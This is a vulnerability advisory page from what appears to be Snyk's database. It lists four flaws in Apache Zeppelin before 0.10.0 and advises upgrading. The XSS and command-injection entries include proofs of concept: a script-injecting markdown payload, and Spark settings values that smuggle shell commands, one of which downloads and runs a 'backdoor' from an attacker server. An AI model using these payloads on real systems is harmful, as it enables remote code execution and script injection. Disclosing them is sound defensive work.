org.apache.zeppelin:zeppelin@0.9.0-preview2 vulnerabilities

  • latest version

    0.11.2

  • latest non vulnerable version

  • first published

    9 years ago

  • latest version published

    5 months ago

  • licenses detected

  • package manager

  • Direct Vulnerabilities

    Known vulnerabilities in the org.apache.zeppelin:zeppelin package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Improper Input Validation

    org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

    Affected versions of this package are vulnerable to Improper Input Validation in Move folder to Trash feature allowing an attacker to delete arbitrary files.

    How to fix Improper Input Validation?

    Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

    [,0.10.0)
    • M
    Cross-site Scripting (XSS)

    org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the markdown interpreter of Apache Zeppelin, which allows an attacker to inject malicious scripts.

    PoC

    %md
    foo
    <script>alert(String.fromCharCode(88,83,83))</script>
    bar
    <bold onclick='alert("a");'>qqq</bold>
    

    How to fix Cross-site Scripting (XSS)?

    Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

    [,0.10.0)
    • M
    Command Injection

    org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

    Affected versions of this package are vulnerable to Command Injection. Bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings.

    PoC

    # Insert into Spark interpreter settings
    # This example will also crash Spark jobs because command line is truncated
    spark.executor.memory=16g;touch${IFS%?}/tmp/test
    
    # Or another example, in this case Spark jobs will be executed normally without interruption 
    spark.driver.cores=2`{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}`
    

    How to fix Command Injection?

    Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

    [,0.10.0)
    • M
    Access Restriction Bypass

    org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

    Affected versions of this package are vulnerable to Access Restriction Bypass. An Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user.

    How to fix Access Restriction Bypass?

    Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

    [,0.10.0)